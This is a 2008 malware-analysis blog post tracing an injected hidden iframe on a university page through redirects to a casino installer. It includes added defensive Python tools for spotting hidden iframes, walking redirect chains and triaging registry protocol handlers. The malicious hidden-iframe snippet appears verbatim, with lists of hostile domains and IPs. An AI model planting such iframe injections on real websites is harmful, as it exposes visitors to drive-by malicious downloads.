On 9 November 2008, a university web page hosted obfuscated JavaScript that, when decoded, revealed a hidden iframe pointing to hxxp://amhvcketn.com/ld/ment/ (66.232.111.112). The following analysis tracks the redirect chain and the file it ultimately delivers.
<div style="visibility:hidden"><iframe src="hxxp://amhvcketn.com/ld/ment/" width=100 height=80></iframe></div>
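The injected snippet above is the classic hidden-container trick: the iframe itself has normal dimensions, but its parent div is invisible. The following is an added example (not code from the original post) that scans an HTML document for iframes a visitor would never see, covering this variant as well as display:none and 1x1 frames. SAMPLE_HTML is a constructed page modelled on the snippet; the youtube and example.test frames are invented for contrast.

```python
"""Scan an HTML document for iframes that a visitor would never see.

Added example (not from the original post). SAMPLE_HTML is a constructed
page modelled on the injected snippet; the youtube and example.test
frames are made up for contrast.
"""
from html.parser import HTMLParser
import re

SAMPLE_HTML = """
<html><body>
<h1>Department of Something</h1>
<p>Welcome to the department web page.</p>
<div style="visibility:hidden"><iframe src="hxxp://amhvcketn.com/ld/ment/" width=100 height=80></iframe></div>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<iframe src="hxxp://example.test/x" width="1" height="1" style="display:none"></iframe>
</body></html>
"""

# CSS that takes an element (and everything inside it) out of view.
HIDING_CSS = re.compile(r"(visibility\s*:\s*hidden|display\s*:\s*none)", re.I)

# Elements that never get a closing tag; they must not push onto the ancestor stack.
VOID_TAGS = {"br", "img", "input", "meta", "link", "hr", "area", "base",
             "col", "embed", "source", "wbr"}


def _hidden_by_attrs(attrs):
    """True if the element's own style or dimensions make it effectively invisible."""
    if HIDING_CSS.search(attrs.get("style", "")):
        return True
    try:
        width = int(attrs.get("width", "").strip("\"' "))
        height = int(attrs.get("height", "").strip("\"' "))
    except ValueError:
        return False          # missing or non-numeric size: not a 1x1 frame
    return width <= 1 or height <= 1


class HiddenIframeFinder(HTMLParser):
    """Track whether any open ancestor is hidden so nested iframes inherit it."""

    def __init__(self):
        super().__init__()
        self._ancestor_hidden = []   # one bool per currently open element
        self.findings = []           # (src, reason)

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        hidden_here = _hidden_by_attrs(attrs)
        if tag == "iframe":
            if hidden_here:
                self.findings.append((attrs.get("src", ""), "iframe itself hidden or 1x1"))
            elif any(self._ancestor_hidden):
                self.findings.append((attrs.get("src", ""), "inside hidden ancestor"))
        if tag not in VOID_TAGS:
            self._ancestor_hidden.append(hidden_here)

    def handle_endtag(self, tag):
        if self._ancestor_hidden:
            self._ancestor_hidden.pop()


def find_hidden_iframes(html):
    """Return [(src, reason), ...] for every iframe a visitor would not see."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for src, reason in find_hidden_iframes(SAMPLE_HTML):
        print(f"{reason}: {src}")
```

The ancestor stack is what catches the case on this page: checking the iframe tag alone would pass it, since nothing about the iframe itself is suspicious. Run it over a crawl of a site you maintain and treat any hit pointing off-domain as a page to pull and decode.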
The hxxp://amhvcketn.com/ld/ment/ request returned an HTTP 302 redirect to hxxp://amhvcketn.com/cgi-bin/index.cgi?mentat
The hxxp://amhvcketn.com/cgi-bin/index.cgi?mentat request returned an HTTP 302 redirect to hxxp://for777daily.com/479/.
The hxxp://for777daily.com/479/ request returned advertising content for a Gold Casino promotion.
The “Download” and “Play Now!” buttons both link to hxxp://for777daily.com/479/SmartDownload.exe
<a href="SmartDownload.exe"><img src="images/download.gif" width="271" height="83" alt="" border="0"></a>
<a href="SmartDownload.exe"><img src="images/playnow.gif" width="96" height="124" alt="" border="0"></a>
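The two 302 hops above were recorded by refusing to let the client auto-follow redirects, so that every intermediate host and status is logged. The following is an added example (not the post's own tooling) of that walk: live_fetch() issues real requests without following redirects, and SAMPLE_RESPONSES is a constructed, offline stand-in that reproduces the chain described above so the logic can be exercised without touching the hostile hosts. The loop and hop-limit handling go beyond what the post shows.

```python
"""Follow an HTTP redirect chain one hop at a time, recording each URL and status.

Added example, not from the original post. live_fetch() does real requests
(without auto-following redirects); SAMPLE_RESPONSES is a constructed table
reproducing the hops described in the analysis, using the defanged URLs.
"""
import urllib.error
import urllib.request
from urllib.parse import urljoin

REDIRECT_CODES = {301, 302, 303, 307, 308}
MAX_HOPS = 10

# Constructed table: url -> (status, Location header). Defanged URLs copied from the analysis.
SAMPLE_RESPONSES = {
    "hxxp://amhvcketn.com/ld/ment/": (302, "hxxp://amhvcketn.com/cgi-bin/index.cgi?mentat"),
    "hxxp://amhvcketn.com/cgi-bin/index.cgi?mentat": (302, "hxxp://for777daily.com/479/"),
    "hxxp://for777daily.com/479/": (200, None),
}


def fake_fetch(url):
    """Offline fetcher for the sample chain; unknown URLs look like a 404."""
    return SAMPLE_RESPONSES.get(url, (404, None))


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so every hop is reported to the caller."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def live_fetch(url, timeout=10):
    """One real request; returns (status, Location or None) without following it."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:      # 3xx (unfollowed) and 4xx/5xx both land here
        return err.code, err.headers.get("Location")


def follow_chain(url, fetch=live_fetch, max_hops=MAX_HOPS):
    """Return [(url, status), ...]; the last entry is the final page, a loop, or the hop cap."""
    hops, seen = [], set()
    while True:
        if url in seen:
            hops.append((url, "loop"))
            return hops
        if len(hops) >= max_hops:
            hops.append((url, "hop limit"))
            return hops
        seen.add(url)
        status, location = fetch(url)
        hops.append((url, status))
        if status in REDIRECT_CODES and location:
            url = urljoin(url, location)       # Location may be relative
        else:
            return hops


if __name__ == "__main__":
    for hop_url, status in follow_chain("hxxp://amhvcketn.com/ld/ment/", fetch=fake_fetch):
        print(f"{status}  {hop_url}")
```

Against a live chain, replace fake_fetch with the default live_fetch and run from an isolated analysis box; the intermediate cgi-bin host is the one you want in your indicator list, and an auto-following client would never show it.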
Domain Analysis:
amhvcketn.com is registered in RU and 66.232.111.112 is registered to NOC4Hosts Inc., US.
Several other malicious domains resolved to 66.232.111.112 at the time of analysis.
adk2lev.com
aqlgdjeni.com
avegeni.com
biedetn.com
bov2bllev.com
brzgeni.com
dfn2etn.com
fhp4etn.com
fqmgdjeni.com
frzvetn.com
giqgetn.com
gsagcketn.com
gsajetn.com
htb4cketn.com
htbgetn.com
ikfjcketn.com
iucvetn.com
jlgvcketn.com
for777daily.com is registered in RU and 58.20.129.158 is registered in China.
SmartDownload.exe Analysis:
SmartDownload.exe
ea93453c6392e17fc3f858dd1d08b7f3
466,752 bytes
Upon execution SmartDownload.exe creates the C:\Program Files\Gold VIP Club Casino directory and opens an installer window.
SmartDownload.exe connects to locator.realtimegaming.com (200.122.168.237) on TCP port 20000 to retrieve its server configuration, a locator exchange that functions like a C2 check-in. The client sends the string “Gold VIP Club Casino” and receives the string “200.122.168.189”. A second connection returns the string hxxp://download.realtimegaming.com/cdn/goldvipclub. The client then connects to download.realtimegaming.com, which is fronted by Akamai caching, and downloads the installation package list files package_list.ini.crc and package_list.ini.zip:
GET /cdn/goldvipclub/package_list.ini.crc HTTP/1.1
Host: download.realtimegaming.com

GET /cdn/goldvipclub/package_list.ini.zip HTTP/1.1
Host: download.realtimegaming.com
The domain realtimegaming.com is registered to RealTime Gaming Holding Company, LLC (Costa Rica).
Reverse lookups for 200.122.168.237 rotate through several casino themed domains.
affiliateglobal.clubusacasino.com
mycasinoaccounts.com
affiliateglobal.clubusacasino.net
api.mycasinoaccounts.com
integrations.mycasinoaccounts.com
www.mycasinoaccounts.com
cs.realtimegaming.com
globalaffiliates.betmaxcasino.com
The following major files are created.
c:\Program Files\Gold VIP Club Casino\casino.dll
27cc0f7692c95d15a43b8e1221cb2e3f
745,472 bytes
c:\Program Files\Gold VIP Club Casino\casino.exe
7bcfafbe500a3b440e9b18431997022a
30,720 bytes
The following major registry keys are added. They register casino.exe as a COM local server and as the handler for the custom rtg.goldvipclub URL protocol (so any web page link using that scheme launches casino.exe with the full URL passed as its %1 argument), and add an Add/Remove Programs uninstall entry.
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816} "(Default)"
Type: REG_SZ
Data: Gold Vip Club Casino
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\LocalServer32 "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\ProgID "(Default)"
Type: REG_SZ
Data: rtg.goldvipclub
HKEY_CLASSES_ROOT\rtg.goldvipclub "(Default)"
Type: REG_SZ
Data: URL: Realtime Gaming Protocol
HKEY_CLASSES_ROOT\rtg.goldvipclub "URL Protocol"
Type: REG_SZ
Data:
HKEY_CLASSES_ROOT\rtg.goldvipclub\CLSID "(Default)"
Type: REG_SZ
Data: {0CBAA404-8C7F-4070-8E42-8847E2394816}
HKEY_CLASSES_ROOT\rtg.goldvipclub\DefaultIcon "(Default)"
Type: REG_SZ
Data: casino.exe
HKEY_CLASSES_ROOT\rtg.goldvipclub\shell\open\command "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gold VIP Club Casino "DisplayName"
Type: REG_SZ
Data: Gold VIP Club Casino
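The shell\open\command value above is the security-relevant part of this registration: once it exists, any page the browser renders can start casino.exe with attacker-chosen text in %1. To triage this kind of registration from a hive export rather than a live box, here is an added example (not the post's own code) that parses reg export style text, lists every custom URL protocol handler under HKEY_CLASSES_ROOT, and flags commands worth a second look. SAMPLE_REG is constructed from the keys listed above plus an invented benign example-proto handler for contrast; the flag criteria (unquoted executable path with spaces, unquoted %1) are this example's own.

```python
"""List custom URL protocol handlers from a .reg export and flag risky commands.

Added example, not from the original post. SAMPLE_REG is constructed from
the rtg.goldvipclub keys in the analysis plus an invented benign handler.
"""
import re

SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\rtg.goldvipclub]
@="URL: Realtime Gaming Protocol"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\rtg.goldvipclub\CLSID]
@="{0CBAA404-8C7F-4070-8E42-8847E2394816}"

[HKEY_CLASSES_ROOT\rtg.goldvipclub\shell\open\command]
@="c:\\program files\\gold vip club casino\\casino.exe %1"

[HKEY_CLASSES_ROOT\example-proto]
@="URL:Example Protocol"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\example-proto\shell\open\command]
@="\"C:\\Program Files\\Example\\handler.exe\" \"%1\""
"""


def _unescape(s):
    """Undo .reg string escaping (a backslash before a backslash or a quote)."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: value}}; default value is '(Default)'."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = "(Default)" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
            value = m.group(2)
            if len(value) >= 2 and value.startswith('"') and value.endswith('"'):
                value = _unescape(value[1:-1])   # dword:/hex: values are kept raw
            keys[current][name] = value
    return keys


def command_flags(cmd):
    """Return (executable, [reasons]) for a shell open command string."""
    flags = []
    if cmd.startswith('"'):
        exe = cmd[1:cmd.find('"', 1)]
    else:
        m = re.match(r"(.*?\.exe)", cmd, re.I)
        exe = m.group(1) if m else cmd.split(" ")[0]
        if " " in exe:
            flags.append("unquoted executable path with spaces")
    if "%1" in cmd and '"%1"' not in cmd:
        flags.append("%1 passed unquoted")
    return exe, flags


def url_protocol_handlers(reg_text):
    """Every HKCR\\<scheme> key carrying a 'URL Protocol' value, with its launch command."""
    keys = parse_reg(reg_text)
    handlers = []
    for key, values in keys.items():
        parts = key.split("\\")
        if len(parts) != 2 or parts[0].upper() != "HKEY_CLASSES_ROOT":
            continue
        if "URL Protocol" not in values:
            continue
        cmd = keys.get(key + r"\shell\open\command", {}).get("(Default)", "")
        exe, flags = command_flags(cmd)
        handlers.append({"protocol": parts[1], "command": cmd, "exe": exe, "flags": flags})
    return handlers


if __name__ == "__main__":
    for h in url_protocol_handlers(SAMPLE_REG):
        print(f"{h['protocol']}: -> {h['exe']}  {', '.join(h['flags']) or 'ok'}")
```

On a live system, feed it the output of reg export HKEY_CLASSES_ROOT; the same parser applies to an export taken from a mounted hive during forensics. Anything that resolves to a user-writable directory or passes %1 bare deserves the hash and signature check before you decide it is a legitimate product.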
Launching Gold VIP Club Casino initiates a connection to 200.122.168.189 on TCP port 22053, the address handed out by the locator exchange above. The casino game requires an account to be created and personal information to be provided. Not sure how much I would trust a game that was installed through obfuscated JavaScript, a series of redirects and deceptive advertising :)
Wednesday, November 12, 2008